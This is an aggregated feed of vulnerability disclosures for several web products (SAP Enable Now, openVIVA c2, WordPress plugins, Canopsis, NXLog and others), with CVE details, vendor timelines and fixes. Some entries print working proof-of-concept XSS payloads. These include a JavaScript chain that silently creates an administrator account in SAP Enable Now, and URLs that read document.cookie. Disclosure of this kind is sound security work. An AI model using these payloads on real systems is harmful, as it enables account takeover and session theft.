This vulnerability could allow an attacker to store a malicious JavaScript payload in the login footer and login page description parameters within the administration panel.

Affected Resources

Canopsis, version 23.04-alpha3.

Description

INCIBE has coordinated the publication of 2 vulnerabilities in Canopsis, an open source hypervisor solution belonging to Capensis, which have been discovered by Pedro José Navas Pérez of Hispasec.

These vulnerabilities have been assigned the following codes, CVSS v3.1 base score, CVSS vector string and the CWE vulnerability type of each vulnerability:

*   **CVE-2023-3196**: CVSS v3.1: 4,7 | CVSS: AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L | CWE-79.
*   **CVE-2023-4564**: CVSS v3.1: 4,7 | CVSS: AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L | CWE-79.

Solution

No solution has been identified at this stage.

Detail

*   **CVE-2023-3196**: an XSS vulnerability stored in Canopsis has been found affecting version 23.04-alpha3. This vulnerability could allow an attacker to store a malicious JavaScript payload in the login footer and login page description parameters within the administration panel.
*   **CVE-2023-4564**: an XSS vulnerability stored in Canopsis has been detected affecting version 23.04-alpha3. This vulnerability could allow an attacker to store a malicious JavaScript payload in the broadcast message parameter within the admin panel.

CVE-2023-3196: Multiple Vulnerabilities Canopsis Capensis | INCIBE-CERT

SAP Enable Now Manager version 10.6.5 Build 2804 Cloud Edition suffers from cross site request forgery, cross site scripting, and open redirection vulnerabilities.

    SEC Consult Vulnerability Lab Security Advisory < 20230927-0 >=======================================================================               title: Multiple Vulnerabilities             product: SAP® Enable Now Manager  vulnerable version: 10.6.5 (Build 2804) Cloud Edition       fixed version: May 2023 Release          CVE number: N/A (cloud)              impact: high            homepage: https://www.sap.com/about.html               found: 2022-10-21                  by: Paul Serban (Eviden)                      Fabian Hagg (Office Vienna)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Eviden business                      Europe | Asia                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"SAP Enable Now solution provides advanced in-application help andtraining capabilities helping you to improve productivity and useradoption, as well as to increase satisfaction of the end-user experience.Create, maintain, and deliver in-application help, learning materials,and documentation content easily."Source: https://www.sapstore.com/solutions/41243/SAP-Enable-NowBusiness recommendation:------------------------Due to the Cloud Edition being affected, the vendor automatically pusheda fix in the production environment in the May 2023 Release.SEC Consult recommends to perform a thorough security review conducted bysecurity professionals to identify and resolve potential further criticalsecurity issues.Vulnerability overview/description:-----------------------------------Multiple vulnerabilities were identified that could be chained together inorder to allow a remote, unauthenticated attacker to create new administrativeuser accounts by tricking the victim to click on a malicious link or visita malicious website prepared by the attacker.1) Open Redirect/URL Redirection VulnerabilityThe file download feature of the application contains an unvalidatedparameter value that exposes it to an open redirect vulnerability. Anattacker can create a malicious URL which would redirect the victim toa malicious site, for example, a phishing site convincing the victimto login once again.2) Reflected Cross Site Scripting (XSS)A reflected XSS vulnerability was found affecting the same parameter asused in 1). Due to insufficient input validation and output encoding, anattacker can inject arbitrary HTML or JavaScript code into the generatedserver response, executing it in the browser of the victim. The vulnerability,can be exploited, for example, to create new administrative user accountsin the application, thereby fully compromising the application. Any CSRFprotection can be bypassed by means of this vulnerability.3) Insufficient Cross-Site Request Forgery (CSRF) ProtectionNo implementation of CSRF protection was detected in the application.Using this vulnerability, an attacker can issue requests in the contextof administrative user sessions. This includes critical state changingactions such as user creation or role assignment. Note that in thetest environment the option 'Supported Functions' was set to value'DISABLE-CSRF-PROTECTION' in the server settings feature of the application.Certain configurations require this setting to be enabled, e.g. to allowthe SEN Workflow Approver extension to submit the data on behalf of thelogged-in user to the SAP Enable Now Manager. Without this parameter,the extension will only be able to read the content and workflow information)This indicates that there is an insecure feature which allows the protectionmechanism to be disabled globally. It could not be clarified if this is thedefault setting. In any case, the function should still be enhanced to protectcritical actions such as functions used in user management or role/permissionmanagement even if the mechanism is disabled by configuration.Proof of concept:-----------------1) Open Redirect/URL Redirection VulnerabilityThe public endpoint /resources/open_file.html is vulnerable to anopen redirect via GET parameter 'info'. To verify this vulnerability,it is sufficient to open the following URL in a web browser.https://example.enable-now.cloud.sap/resources/open_file.html?info=https://www.sec-consult.comAfter browsing to the above link, the victim gets redirected towww.sec-consult.com in a new browser window opened by the embeddedcall of function window.open(). Note that both attacker and victimdo not have to be authenticated for successful exploitation.2) Reflected Cross-Site Scripting (XSS)The public endpoint /resources/open_file.html is affected by an XSSvulnerability in GET parameter 'info'. To verify this vulnerability,it is sufficient to open the following URL in a web browser.https://example.enable-now.cloud.sap/resources/open_file.html?info=javascript:alert(document.domain)After browsing to the above link, the domain property returns thedomain name of the server it was loaded from an alert window withinthe browser of the victim. This proves the successful execution of theinjected JavaScript code. In fact, any kind of JavaScript code couldbe injected by the attacker. Note that both attacker and victim donot have to be authenticated for successful exploitation.3) Insufficient Cross-Site Request Forgery (CSRF) ProtectionNo CSRF protection can be observed in POST requests sent between theclient and server. This includes at least the functions "task creation","user creation", "permission assignment" and "role/group assignment". Notethat this vulnerability appears to only affect systems where the CSRF protectionis disabled by option 'Supported Functions' set to value 'DISABLE-CSRF-PROTECTION'in the server settings. Although this setting can be reverted, it is advisedto have the protection enabled for critical operations such as user creationor permission assignment at any time (also when the option is set).Several of the vulnerabilities above can be chained together by anunauthenticated attacker. Considering the types of vulnerabilities,there are multiple exploitation scenarios. In our example we willcreate a link that, when clicked by an administrator victim, willcreate a new admin account. For this attack to work, we first needto gather some information. To create an account, we need to know twoimportant values: the OU and the UID. The OU represents the OrganizationalUnit unique identifier. The UID here represents the unique Group IDof our target group where we want our new user to be added. Performinga simple GET request to endpoint /self/group, both values can beobtained. The following listing shows the server response.------------------------------------------------------------------------------------------------HTTP/1.1 200Cache-Control: no-cache, no-store, must-revalidateExpires: 0Vary: OriginSet-Cookie: JSESSIONID=DD67AF<snip>ADF784; Path=/; Secure; HttpOnly;Content-Type: text/json;charset=UTF-8Server: SAPConnection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadContent-Length: 396{"response":{"group":[{"name":"Learners","uid":"G_1C67681<snip>60E0938C4CB086","ou":"OU_E8BC20E2<snip>8034410C", "active":true},{"name":"Master Authors","uid":"G_72568DE0<snip>85DE0845","ou":"OU_E8BC20E2<snip>8034410C ","active":true},{"name":"Administrators","uid":"G_3B5DBB<snip>A97DE47C4EDF","ou":"OU_E8BC20E2<snip>80344 <-- UID of admin group and OU10C ","active":true}]}}------------------------------------------------------------------------------------------------Finally, in order for the attack to succeed, the attacker needsthe victim (logged in as administrator) to do first a request onthe above endpoint, then a POST request on the endpoint /!/userto actually create the new user account with the administratorrole assigned using the values taken from the previous response.These interactions can be scripted using the following ten linesof JavaScript code.------------------------------------------------------------------------------------------------var req1 = new XMLHttpRequest();req1.open('GET', "https://example.enable-now.cloud.sap/self/group",false);req1.withCredentials = true;req1.send();var obj = JSON.parse(req1.responseText).response;for (var i = 0; i< obj.group.length ;i++) {if (obj.group[i].name === 'Administrators') {var uid = obj.group[i].uid;var ou = obj.group[i].ou}};var req2 = new XMLHttpRequest();req2.open('POST',"https://example.enable-now.cloud.sap/!/user",false);req2.withCredentials = true;req2.send(JSON.stringify({"user":{"auth_user":"sapmatt","firstname":"SEC","lastname":"Consult","email":"","passwd":"sappass","role":[uid],"ou":ou}}));------------------------------------------------------------------------------------------------We can base64-encode this payload and pass it to the Javascript eval(atob())function using the XSS vulnerability in the file download feature (seen in 2.).The link could then be shortened to enhance the likelihood of successfulexploitation. This can be achieved, for example, by leveraging the Open Redirectvulnerability (seen in 1.) to redirect the victim to an attacker-controlledwebsite and trigger the above payload, making it an attack more likely tosucceed. If the victim is logged into the application and is part ofthe Administrator group, when they click on this link, a new adminaccount will be instantly created. The attacker then can log in and hasfull control over the application.Vulnerable / tested versions:-----------------------------The following versions of the software were found to be vulnerable during our tests:- SAP Enable Now Manager Version: 10.6.5 (Build 2804) - Cloud Edition (~October 2022)Vendor contact timeline:------------------------2022-11-08: Contacting vendor via secure@sap.com2022-11-10: Vendor requested screenshots and steps to reproduce2022-11-10: Informed vendor the previously provided POC contains the steps to reproduce             and screenshots weren't available at that time2022-11-10: Vendor confirmed issues are under review2022-11-18: Contacted vendor to request an update2022-11-18: Vendor confirmed issues are still under review2022-12-01: Vendor reached back to confirm a Security Incident ticket was opened to             the Engineering Team2023-02-02: Contacted vendor to request an update2023-02-03: Vendor confirmed that engineering had fixes ready and waiting on a             release schedule.2023-02-07: Vendor confirmed fix was deployed to production for ticket no #22801965642023-04-14: Contacted vendor to request update on ticket no #2280196563 fix2023-04-17: Vendor mentioned that the fix is scheduled to be deployed in May release2023-05-08: Vendor confirmed fix was deployed to production for 22801965632023-09-27: Public release of security advisory.Solution:---------Due to the Cloud Edition being affected, the vendor automatically pusheda fix in the production environment in the May 2023 Release.Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF P. Serban, F. Hagg / @2023

SAP Enable Now Manager 10.6.5 Build 2804 Cloud Edition CSRF / XSS / Redirect

openVIVA c2 suffers from a persistent cross site scripting vulnerability. Versions prior to 20220801 are affected.

SEC Consult Vulnerability Lab Security Advisory < 20230925-0 >  
=======================================================================  
               title: Stored Cross-Site Scripting  
             product: mb Support broker management solution openVIVA c2  
  vulnerable version: <20220801  
       fixed version: =>20220801  
          CVE number: CVE-2022-39172  
              impact: Medium  
            homepage: https://mbsupport.de  
               found: 2022-03-16  
                  by: Daniel Hirschberger (Office Bochum)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com  
=======================================================================

Vendor description:  
-------------------  
"Support small and medium-sized companies as well as large corporate customers  
with just one software. Sales , inventory management , billing , e-mail and  
much more - with openVIVA c2 you get everything in one application. Without  
system disruption and in one database, you can do all the work of an insurance  
broker with one piece of software.

Connect brokers, intermediaries, insurers and customers directly with our  
self-service portals . Strengthen your customer relationships and work more  
efficiently yourself.

mb Support offers portals for intermediaries as well as industrial and  
commercial customers and tailor-made portal solutions for insurers, brokers and  
private customers."

Source: https://mbsupport.de/

Business recommendation:  
------------------------  
The vendor provides an updated version to their customers.

An in-depth security analysis performed by security professionals is  
highly advised, as the software may be affected from other security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Stored Cross-Site Scripting (CVE-2022-39172)  
An authenticated attacker with privileges of the role 'user' can create a new  
'Vorgang' (Process). The field 'Name' is not sanitized and enables an attacker  
to perform a stored XSS attack. Additionally, the field 'Hauptverantwortlicher'  
(persons mainly responsible) can be used to assign this 'Vorgang' to another user  
who will receive it in his overview list. This results in a targeted stored  
XSS attack.

Proof of concept:  
-----------------  
1) Stored Cross-Site Scripting (CVE-2022-39172)  
The application is developed on top of Oracle Apex  
(https://apex.oracle.com/en/) which provides several security features to  
developers. Two of those are request replay protection and parameter  
checksumming which make it hard to develop a PoC which only consists of  
requests and responses. Therefore this PoC will be a textual description of the  
required steps and supplemented with pictures. Additionally the library  
'AlertifyJS' is used, which changes the appearance of alert popups which  
can be confusing if you are used to the standard alert popups.

To execute the attack the following steps have to be performed:  
1. Log in to openVIVA c2  
2. Go to 'mein openVIVA' (my openVIVA)  
3. Click on 'Vorgangszuordnung' (Process Assignment)  
4. Click on 'Neuen Vorgang starten' (Start new Process)  
5. In the new form enter the XSS payload into the 'Name' field, for example  
    "<script>alert('XSS')</script>"  
6. Choose your victim as 'Hauptverantwortlicher' (persons mainly responsible)  
7. Click on the three dots  
8. Click on 'Speichern' (save)

The victim now has a new 'Vorgang' in his inbox. If the 'Vorgänge' menu is clicked,  
the victim is redirected to the list of assigned 'Vorgänge'. Because our payload  
is in the name field it is executed as soon as the list of processes is loaded.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and found to be vulnerable:  
* openVIVA c2 20220101

Vendor contact timeline:  
------------------------  
2022-03-30: Contacting vendor through email followed by a telephone call,  
             sent the advisory  
2022-04-20: Asking for status update  
2022-04-22: Patch release is planned for August  
2022-07-26: Statuscall: Patch exists, advisory release delayed until  
             rollout to all customers is complete (~ August 2023(!))  
2023-09-18: Asking for a status update and patch download information.  
             Vendor response: no public link available; few customers  
             still have no patch.  
2023-09-25: Release of security advisory

Solution:  
---------  
Upgrade to version 2022-08-01 or later. The vendor has no public  
download link available as all customers will be patched according  
to their maintenance contract.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult? Send us your application  
https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Daniel Hirschberger / @2023

openVIVA c2 20220101 Cross Site Scripting

WordPress Contact Form Generator plugin version 2.5.5 suffers from a cross site scripting vulnerability.

    # Exploit Title: WP Plugins Contact Form Generator 2.5.5 - Reflected Cross-Site Scripting# Date: 03-10-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/contact-form-generator/# Vendor Homepage: https://www.creative-solutions.net/# Version: 2.5.5 # Tested on: Windows, Linux# CVE: CVE-2023-37988# Product DescriptionContact Form Generator is a powerful contact form builder for WordPress! It is structured for creating Contact Forms, Application Forms, Reservation Forms, Survey Forms, Contact Data Pages and much more. You will get ready-to-use forms just after installation. Ref: https://wordpress.org/plugins/contact-form-generator/# Vulnerability overview:The Wordpress plugins Contact Form Generator (CFG) <= 2.5.5 is vulnerable to reflected cross-site scripting via the id parameter in the Edit Fields form. This vulnerability could allow an unauthenticated malicious actor to inject malicious scripts against high privilege users.# Proof of Concept:Affected Endpoint: /wp-admin/admin.php?page=cfg_fields&act=edit&id=Affected Parameters: idXSS Payload: "><script>alert(document.cookie)</script>xhttp://example.com/wp-admin/admin.php?page=cfg_fields&act=edit&id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ex# RecommendationUpgrade to version 2.6.0

WordPress Contact Form Generator 2.5.5 Cross Site Scripting

WordPress KiviCard plugin version 3.2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: WP Plugins KiviCare 3.2.0 - Reflected Cross-Site Scripting# Date: 03-10-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/kivicare-clinic-management-system/# Vendor Homepage: https://kivicare.io/# Version: 3.2.0# Tested on: Windows, Linux# CVE: CVE-2023-2624# Product DescriptionKiviCare is the most affordable self-hosted clinic and patient management system based on the WordPress platform. Set up your online clinic in no time. Ref: https://kivicare.io/# Vulnerability overview:The Wordpress plugins KiviCare - Clinic & Patient Management System (EHR) <= 3.2.0 is vulnerable to reflected cross-site scripting via the filterType parameter in the get weekly appointment function. This vulnerability could allow a malicious actor to inject malicious scripts.# Proof of Concept:Affected Endpoint: /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=Affected Parameters: filterTypeXSS Payload: <img src=x onerror=alert(document.cookie)>http://192.168.56.115/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E# RecommendationUpgrade to version 3.2.1

WordPress KiviCare 3.2.0 Cross Site Scripting

Cross-Site Request Forgery (CSRF) vulnerability in POEditor plugin <= 0.9.4 versions.

**Solution**

 Fixed

Update the WordPress POEditor plugin to the latest available version (at least 0.9.5).

Found this useful? Thank Elliot for reporting this vulnerability. Buy a coffee ☕

Elliot discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress POEditor Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 0.9.5.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-32091: WordPress POEditor plugin <= 0.9.4 - Cross Site Request Forgery (CSRF) to stored XSS vulnerability - Patchstack

A stored XSS vulnerability has been found on BuddyBoss Platform affecting version 2.2.9. This vulnerability allows an attacker to store a malicious javascript payload via POST request when sending an invitation.

Affected Resources

WordPress sites using BuddyBoss Platform version 2.2.9.

Description

INCIBE has coordinated the publication of 3 vulnerabilities in BuddyBoss Platform, which has been discovered by Anxo Januario Gonzales.

These vulnerabilities have been assigned the following codes:

*   **CVE-2023-32669:**
    *   CVSS v3.1 base score: 5,4.
    *   CVSS vector string: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N.
    *   Vulnerability type: CWE-639: authorization bypass through user-controlled Key
*   **CVE-2023-32670:**
    *   CVSS v3.1 base score: 9,0.
    *   CVSS vector string: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H.
    *   Vulnerability type: CWE-79: improper neutralization of input during web page generation ('Cross-site Scripting').
*   **CVE-2023-32671:**
    *   CVSS v3.1 base score: 6,3.
    *   CVSS vector string: AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N.
    *   Vulnerability type: CWE-79: improper neutralization of input during web page generation ('Cross-site Scripting').

Solution

No solution has been identified at this time.

Detail

*   **CVE-2023-32669:** authorization _bypass_ vulnerability, the exploitation of which could allow an authenticated user to access and rename other users' albums. This vulnerability can be exploited by changing the album identification (id).
*   **CVE-2023-32670:** Cross-Site Scripting vulnerability, which could allow a local attacker with basic privileges to execute a malicious _payload_ through the "\[name\]=image.jpg" parameter, allowing to assign a persistent _javascript payload_ that would be triggered when the associated image is loaded.
*   **CVE-2023-32671:** Stored Cross-Site Scripting vulnerability, the exploitation of which could allow an attacker to store a malicious _javascript payload_ via a POST request when sending an invitation to another user.

CVE-2023-32671: Multiple Vulnerabilities Budyboss | INCIBE-CERT

Cross-Site Request Forgery (CSRF) vulnerability in NXLog Manager 5.6.5633 version. This vulnerability allows an attacker to eliminate roles within the platform by sending a specifically crafted query to the server. The vulnerability is based on the absence of proper validation of the origin of incoming requests.

Affected Resources

NXLog Manager, 5.6.5633 version.

Description

INCIBE has coordinated the publication of 3 vulnerabilities in NXLog Manager, an agent management and monitoring console, which has been discovered by Juampa Rodríguez.

These vulnerabilities have been assigned the following codes:

*   **CVE-2023-32790:**
    *   CVSS v3.1 base score: 4,6.
    *   CVSS vector string: AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L.
    *   Vulnerability type: CWE-79: improper neutralization of input during web page generation ('Cross-site Scripting').
*   **CVE-2023-32791:**
    *   CVSS v3.1 base score: 6,5.
    *   CVSS vector string:AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N.
    *   Vulnerability type: CWE-352: Cross-Site Request Forgery (CSRF).
*   **CVE-2023-32792:**
    *   CVSS v3.1 base score: 6,5.
    *   CVSS vector string: AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N.
    *   Vulnerability type: CWE-352: Cross-Site Request Forgery (CSRF).

Solution

No solution has been identified at this time.

Detail

*   **CVE-2023-32790:** Cross-Site Scripting (XSS) vulnerability in NXLog Manager. This vulnerability allows an attacker to inject a malicious JavaScript payload into the 'Full Name' field during a user edit, due to improper sanitization of the input parameter.
*   **CVE-2023-32791:** Cross-Site Request Forgery (CSRF) vulnerability in NXLog Manager. This vulnerability allows an attacker to manipulate and delete user accounts within the platform by sending a specifically crafted query to the server. The vulnerability is based on the lack of proper validation of the origin of incoming requests.
*   **CVE-2023-32792:** Cross-Site Request Forgery (CSRF) vulnerability in NXLog Manager. This vulnerability allows an attacker to eliminate roles within the platform by sending a specifically crafted query to the server. The vulnerability is based on the absence of proper validation of the origin of incoming requests.

CVE-2023-32792: Multiple Vulnerabilities Nxlog Manager | INCIBE-CERT

Cross-site Scripting (XSS) - Stored in GitHub repository salesagility/suitecrm prior to 7.14.1.

Expand Up

@@ -2521,12 +2521,12 @@ public function cleanBean()

}

  

if (isset($def\['type'\]) && ($def\['type'\] == 'html' || $def\['type'\] == 'longhtml')) {

$this\->$key = htmlentities((string) SugarCleaner::cleanHtml($this\->$key, true));

$this\->$key = purify\_html($this\->$key);

} elseif (

(strpos((string) $type, 'char') !== false || strpos((string) $type, 'text') !== false || $type == 'enum') &&

!empty($this\->$key)

) {

$this\->$key = htmlentities((string) SugarCleaner::cleanHtml($this\->$key, true));

$this\->$key = purify\_html($this\->$key);

}

}

}

Expand Down

CVE-2023-5351: SuiteCRM 7.14.1 Release · salesagility/SuiteCRM@c43eaa3

APIs, also known as application programming interfaces, serve as the backbone of modern software applications, enabling seamless communication and data exchange between different systems and platforms. They provide developers with an interface to interact with external services, allowing them to integrate various functionalities into their own applications.
However, this increased reliance on

API Security / Data Security

APIs, also known as application programming interfaces, serve as the backbone of modern software applications, enabling seamless communication and data exchange between different systems and platforms. They provide developers with an interface to interact with external services, allowing them to integrate various functionalities into their own applications.

However, this increased reliance on APIs has also made them attractive targets for cybercriminals. In recent years, the rise of API breaches has become a growing concern in the world of cybersecurity. One of the main reasons behind the rise of API breaches is inadequate security measures implemented by developers and organizations. Many APIs are not properly secured, leaving them vulnerable to attacks.

Moreover, hackers have developed sophisticated techniques that specifically target weaknesses within APIs. For example, they may leverage malicious code injections into requests or manipulate responses from an API endpoint to gain unauthorized access or extract sensitive information about users.

****The rise of API breaches****

The consequences of an API breach can be severe for both businesses and consumers alike. Organizations may face financial losses due to legal liabilities and reputational damage caused by leaked customer data or disrupted services. Customers risk having their personal information exposed, which can lead to identity theft or other forms of fraud.

For these reasons, ensuring API security is essential due to the interconnected nature of modern software ecosystems. Many organizations rely on third-party integrations and microservices architecture where multiple APIs interact with each other seamlessly. If even one API within this complex network is compromised, it opens doors for attackers to exploit vulnerabilities across interconnected systems.

78% of cybersecurity professionals have faced an API security incident in the past year! How does your industry fare? Find out in our new whitepaper: **API Security Disconnect 2023**.

However, most enterprises turn to their existing infrastructure, like API gateways and web application firewalls (WAFs), for protection. Unfortunately, relying solely on these technologies can leave gaps in the overall security posture of an organization's APIs. Here are some reasons why API gateways and WAFs alone fall short:

1.  **Lack of granular access control:** While API gateways offer basic authentication and authorization capabilities, they may not provide fine-grained access control necessary for complex scenarios. APIs often require more sophisticated controls based on factors such as user roles or specific resource permissions.
2.  **Inadequate protection against business logic attacks:** Traditional WAFs mainly focus on protecting against common vulnerabilities like injection attacks or cross-site scripting (XSS). However, they may overlook potential risks associated with business logic flaws specific to an organization's unique application workflow. Protecting against such attacks requires a deeper understanding of the underlying business processes and implementing tailored security measures within the API code itself.
3.  **Insufficient threat intelligence:** Both API gateways and WAFs rely on predefined rule sets or signatures to detect known attack patterns effectively. However, emerging threats or zero-day vulnerabilities might bypass these preconfigured defenses until new rules are updated by vendors or manually implemented by developers/administrators.
4.  **Data-level encryption limitations:** While SSL/TLS encryption is crucial during data transmission between clients and servers through APIs, it does not always protect data at rest within the backend systems themselves nor guarantee end-to-end encryption throughout the entire data flow pipeline.
5.  **Vulnerability exploitation before reaching protective layers:** If attackers find a vulnerability in the APIs before traffic reaches the API gateway or WAF, they can directly exploit it without being detected by these security measures. This emphasizes the need for robust coding practices, secure design principles, and software tests that identify vulnerabilities early on.
6.  **Lack of visibility into API-specific threats:** API gateways and WAFs may not provide detailed insights into attacks targeting specific API behaviors or misuse patterns. Detecting anomalies such as excessive requests per minute from a single client or unexpected data access attempts requires specialized tools and techniques tailored to monitor API-specific threats comprehensively.

****How organizations are addressing API security****

To get an idea of how many organizations truly understand the unique security proposition that APIs present, we conducted our second annual survey to find out. The _**API Security Trends 2023**_ report includes survey data from over 600 CIOs, CISOs, CTOs, and senior security professionals from the US and UK across six industries. Our goal was to identify how many organizations were affected by API-specific attacks, how they were attacked, how or if they prepared, and ultimately, what they've been doing in response.

Some of the notable data points from the report include the fact that 78% of cybersecurity teams say they've experienced an API-related security incident in the last 12 months. Nearly three-quarters (72%) of respondents have a full inventory of APIs, but of those, only 40% have visibility into which return sensitive data. And because of this reality, 81% say API security is more of a priority now than it was 12 months ago.

But this is just the tip of the iceberg – there's so much more this report reveals. If you're interested in reviewing the research, you can **download the complete report here**.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#xss